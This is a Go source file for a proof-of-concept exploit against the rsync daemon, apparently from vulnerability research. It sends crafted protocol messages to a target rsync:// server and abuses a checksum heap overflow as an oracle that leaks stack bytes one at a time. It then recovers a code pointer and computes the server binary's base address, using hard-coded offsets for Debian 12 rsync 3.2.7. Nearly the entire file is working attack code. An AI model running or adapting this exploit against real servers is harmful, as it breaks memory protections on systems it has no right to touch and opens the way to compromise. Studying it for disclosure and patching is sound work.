// CLI for a PoC for rsync client -> server memory corruption
package main

import (
	"encoding/binary"
	"fmt"
	"io"
	"os"
	"strings"

	"github.com/OneOfOne/xxhash"

	"cvr.google.com/pkg/client"
	"cvr.google.com/pkg/util"
)

// Offsets targeting debian 12 rsync 3.2.7
// sha256sum ab0311a3e8e417aa2f0fd5727f6f5d03c1aedf562a386de03e72faef1e90c1e2
// The text ptr we leak <set_compression+599>
const checkCompressionOffset = 0x42847

const checksumSeed = 1337

// This is the maxBlockSize for protocolVersions > 29
// the old block size is 1 << 31. If we need larger files, we can change
// the protocol versions but it will require debugging the protocol as
// it will be different
const maxBlockSize = 1 << 17

const sumBufSize = 40
const pageSize = 4096
const overflowSize = 64

// the minimum amount of sums that need to be allocated to increase the
// allocation of the hash table by 4096 bytes
const pageIncrementCount = 103

var digest string = "xxh64"
var protocolVersion = "31"
var url string

func nextCount(currCount int) int {
	currCount += pageIncrementCount
	// surely, this is not an infinite loop, right?
	for {
		if (currCount*sumBufSize)%pageSize < overflowSize {
			return currCount
		}
		currCount++
	}

}

// downloads a file from the server. We need the MD4 digest of the file. We can request
// a digest beforehand but rsync doesn't take the checksum seed into account, which
// can't be disabled. That's why we connect once to list all files and pick a file
// for exploitation.
func downloadInitialFile(rclient *client.RsyncClient) ([]byte, int, *client.File, error) {
	defer rclient.Close()

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc. If you change something here, make sure to test it)

	// tell the server that it is supposed to send us the files by making it sender and server
	// the order of --server and --sender is important
	rclient.WriteLine("--server")
	rclient.WriteLine("--sender")

	// set these options to make reading the code easier and to avoid sources of unwanted allocations
	rclient.WriteLine("--no-compress")
	rclient.WriteLine("--no-iconv")

	// set the checksum seed. This will make future calculations a little easier
	rclient.WriteLine("--checksum-seed=" + fmt.Sprintf("%d", checksumSeed))

	// set --checksum which enables `always_checksum`. This will send us the full checksum
	// of the file before sending the file itself.
	// This is useful for us so taht we don't need to download files before performing
	// stack uninitialized data oracles
	rclient.WriteLine("--checksum")

	// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
	// a desync in the protocol depending on compilation options
	rclient.WriteLine("--no-crtimes")
	rclient.WriteLine("--no-atimes")

	// disable some other extra things to prevent the server from sending us extra data
	rclient.WriteLine("--no-owner")
	rclient.WriteLine("--no-group")
	rclient.WriteLine("--no-devices")
	rclient.WriteLine("--no-specials")
	rclient.WriteLine("--no-links")
	rclient.WriteLine("--no-hard-links")
	rclient.WriteLine("--no-acls")

	// disable `inc_recurse` and just send the entire file list at once
	rclient.WriteLine("--no-inc-recursive")

	// setting this will disable allow_inc_recurse and send us the entire file list at once
	// client.WriteLine("--qsort")

	// recursively download the module
	rclient.WriteLine("-r")

	// the -e option is followed by . and then different client information options
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
	// v sets do_negotiated_strings to true, which means we can force md4 checksums
	rclient.WriteLine("-e.v")

	// sending a dot line and then a filepath tells the server which files we are requesting
	// in this case, ask for the root of the module
	rclient.WriteLine(".")
	rclient.WriteLine("./")

	// empty line to finish sending arguments
	err := rclient.WriteLine("")

	// only check for errors here. If the previous arguments were not sent, the server will not
	// send the files anyway
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send arguments: %v\n", err.Error())
		os.Exit(1)
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	err = rclient.SetupProtocol()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to setup protocol: %v\n", err.Error())
		os.Exit(1)
	}

	// Don't send filters
	rclient.WriteRawInt(0)

	files, err := rclient.ReadFileList()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read file list: %v\n", err.Error())
		os.Exit(1)
	}

	// look for a regular file that is smaller than the maxBlockSize.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/match.c#L218-L238
	// The reason for this is that this way we can make rsync generate a digest for the entire
	// file. We already know the digest of the entire file so that way we don't have to download
	// the file and calculate the digest.
	var targetFile *client.File
	targetFileNdx := -1
	for i, file := range files {
		if util.IsReg(file.Mode) && file.Size < maxBlockSize {
			targetFile = &file
			targetFileNdx = i
			break
		}
	}

	if targetFile == nil {
		fmt.Fprintf(os.Stderr, "[-] Could not find a regular file that is smaller than the max block size %d\n", maxBlockSize)
		os.Exit(1)
	}

	fmt.Printf("[*] Targeting file '%s'\n", targetFile.Name)

	// download the file so that the digest can be calculated later
	fileContents, err := rclient.DownloadFile(targetFileNdx, targetFile)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to download file: %v\n", err.Error())
		os.Exit(1)
	}

	return fileContents, targetFileNdx, targetFile, nil

}

// oracleStep connects to the server and performs one comparison of the stack.
// We do one contained connection per comparison so that even if there is dynamic data
// on the stack (heap pointers etc), it will always be the same.
// That's because the daemon runs in a fork loop and libc's allocator is
// deterministic. If we sent the exact same packets, we should get the same data.
func oracleStep(url string, targetNdx, targetSize int, sum1 uint32, oracleValue []byte) (bool, error) {
	rclient, err := client.NewRsyncClient(url, protocolVersion, digest)
	if rclient == nil {
		return false, err
	}
	defer rclient.Close()

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc. If you change something here, make sure to test it)

	// tell the server that it is supposed to send us the files by making it sender and server
	// the order of --server and --sender is important
	rclient.WriteLine("--server")
	rclient.WriteLine("--sender")

	// setup compress-choice so that a recursive function call gets triggered
	// that leads to a global pointer being placed on the stack for the leak
	rclient.WriteLine("--compress-choice=zlib")
	// rclient.WriteLine("--skip-compress=*")
	// rclient.WriteLine("--no-compress")

	rclient.WriteLine("--no-iconv")

	// set the checksum seed. This will make future calculations a little easier
	rclient.WriteLine("--checksum-seed=" + fmt.Sprintf("%d", checksumSeed))

	// set --checksum which enables `always_checksum`. This will send us the full checksum
	// of the file before sending the file itself.
	// This is useful for us so taht we don't need to download files before performing
	// stack uninitialized data oracles
	rclient.WriteLine("--checksum")

	// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
	// a desync in the protocol depending on compilation options
	rclient.WriteLine("--no-crtimes")
	rclient.WriteLine("--no-atimes")

	// disable some other extra things to prevent the server from sending us extra data
	rclient.WriteLine("--no-owner")
	rclient.WriteLine("--no-group")
	rclient.WriteLine("--no-devices")
	rclient.WriteLine("--no-specials")
	rclient.WriteLine("--no-links")
	rclient.WriteLine("--no-hard-links")
	rclient.WriteLine("--no-acls")

	// disable `inc_recurse` and just send the entire file list at once
	rclient.WriteLine("--no-inc-recursive")

	// setting this will disable allow_inc_recurse and send us the entire file list at once
	// client.WriteLine("--qsort")

	// recursively download the module
	rclient.WriteLine("-r")

	// the -e option is followed by . and then different client information options
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
	// v sets do_negotiated_strings to true, which means we can force md4 checksums
	rclient.WriteLine("-e.v")

	// sending a dot line and then a filepath tells the server which files we are requesting
	// in this case, ask for the root of the module
	rclient.WriteLine(".")
	rclient.WriteLine(rclient.Module + "/")

	// empty line to finish sending arguments
	err = rclient.WriteLine("")

	// only check for errors here. If the previous arguments were not sent, the server will not
	// send the files anyway
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send arguments: %v\n", err.Error())
		os.Exit(1)
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	err = rclient.SetupProtocol()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to setup protocol: %v\n", err.Error())
		os.Exit(1)
	}

	// Don't send filters
	rclient.WriteRawInt(0)

	// we have to consume the file list every time to consume the input data from
	// the server
	_, err = rclient.ReadFileList()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read file list: %v\n", err.Error())
		os.Exit(1)
	}

	// we are now ready to kick off the Oracle logic
	// We are now sending the index of the file that we want to download.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/rsync.c#L322
	err = rclient.WriteNdx(targetNdx)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write ndx: %v\n", err.Error())
		os.Exit(1)
	}

	// by setting iflags to ITEM_TRANSFER, rsync does not ask for any more data after this but sends
	// us the file directly
	iflags := client.ItemTransferFlag
	err = rclient.WriteShortInt(iflags)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write iflags: %v\n", err.Error())
		os.Exit(1)
	}

	// we should now  reach receive_sums
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L70

	// first the sum head

	// count leads to an allocation of count * sizeof(struct sum_buf)
	// since we accidentally trigger the heap overflow for the infoleak, we want to
	// make sure the allocation is at least 128KB. This way, libc allocates a large chunk
	// of memory using `mmap()` which has page alignment. As a result, there will
	// be plenty of padding space in the allocation so that our overflow does not crash
	// the server.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L96
	count := 3277

	rclient.WriteRawInt(count)

	// blength is set to the size of the file. That way the md4 hash is calculated for the entire file
	rclient.WriteRawInt(targetSize)

	// oracleValue will be at least 17. The first 16 bytes are the known md4 of the file
	// then the last byte is the byte that we are trying to leak
	rclient.WriteRawInt(len(oracleValue))

	// let's set the remainder to 0. We don't need this
	rclient.WriteRawInt(0)

	// and now write the actual digest for each of the counts, as well as sum1
	for i := 0; i < count; i++ {
		// this is sum1, we need to calculate it
		rclient.WriteRawInt(int(sum1))
		rclient.Write(oracleValue)
	}

	// for some reason, the server will now send us the ndx and iflags back again, although it
	// never modifies them. Let's consume the data
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L409-L410
	_, err = rclient.ReadNdx()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read ndx: %v\n", err.Error())
		os.Exit(1)
	}
	_, err = rclient.ReadShortInt()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read iflags: %v\n", err.Error())
		os.Exit(1)
	}

	// we already know count is going to be 0 so we can just consume it
	rclient.ReadInt()

	// blength is the size of the file. Already known as well
	rclient.ReadInt()

	// s2length as well
	rclient.ReadInt()

	// finally remainder. Check for an error here to see if our connection is still intact
	_, err = rclient.ReadInt()
	if err != nil {
		return false, err
	}

	signal, _, err := rclient.ReceiveDeflateToken()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to receive deflate token: %v\n", err.Error())
		os.Exit(1)
	}

	signal32 := int32(signal)
	rclient.WriteNdx(13371337)

	if signal32 < 0 {
		return true, nil
	} else if signal32 > 0 {
		return false, nil
	} else {
		panic("Signal is 0")
	}

}

func main() {
	if len(os.Args) < 2 {
		fmt.Printf("Usage: %s rsync://<host>:<port>/<module>\n", os.Args[0])
		os.Exit(1)
	}

	url = os.Args[1]
	if !strings.HasPrefix(url, "rsync://") {
		fmt.Printf("urlmust be in format of rsync://<host>:<port>/<module> (it was %s)\n", url)
		os.Exit(1)
	}

	fmt.Printf("[*] Connecting to %s\n", url)

	rclient, err := client.NewRsyncClient(url, protocolVersion, digest)
	if rclient == nil {
		fmt.Fprintf(os.Stderr, "Failed to create client: %v\n", err.Error())
		os.Exit(1)
	}
	fmt.Printf("[*] Connected to %s\n", url)

	fileContents, targetFileNdx, targetFile, err := downloadInitialFile(rclient)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to download initial file: %v\n", err.Error())
		os.Exit(1)
	}

	sum1 := util.Adler32(fileContents)
	h := xxhash.NewS64(checksumSeed)
	io.WriteString(h, string(fileContents))

	sum2 := []byte{}
	sum2 = binary.LittleEndian.AppendUint64(sum2, h.Sum64())

	fmt.Printf("[+] Downloaded target file '%s' with index %d with size %d (%x)\n", targetFile.Name, targetFileNdx, targetFile.Size, sum2)

	leakCount := 8
	for j := 0; j < leakCount; j++ {
		found := false
		for i := 0; i < 256; i++ {
			oracleValue := sum2
			oracleValue = append(oracleValue, byte(i))
			res, err := oracleStep(url, targetFileNdx, targetFile.Size, sum1, oracleValue)
			if err != nil {
				fmt.Fprintf(os.Stderr, "Failed to perform oracle step: %v\n", err.Error())
				i--
				continue
			}
			if res {
				fmt.Printf("[+] Leaked byte %x from stack\n", i)
				sum2 = append(sum2, byte(i))
				found = true
				break
			}

		}
		if found == false {
			fmt.Printf("[-] Could not leak byte %d. Did not find matching byte\n", j)
			j--
			continue
		}
	}

	ptr := binary.LittleEndian.Uint64(sum2[8:])
	fmt.Printf("[+] Leaked ptr: 0x%x\n", ptr)
	fmt.Printf("[+] Text Base: 0x%x\n", ptr-checkCompressionOffset)
}
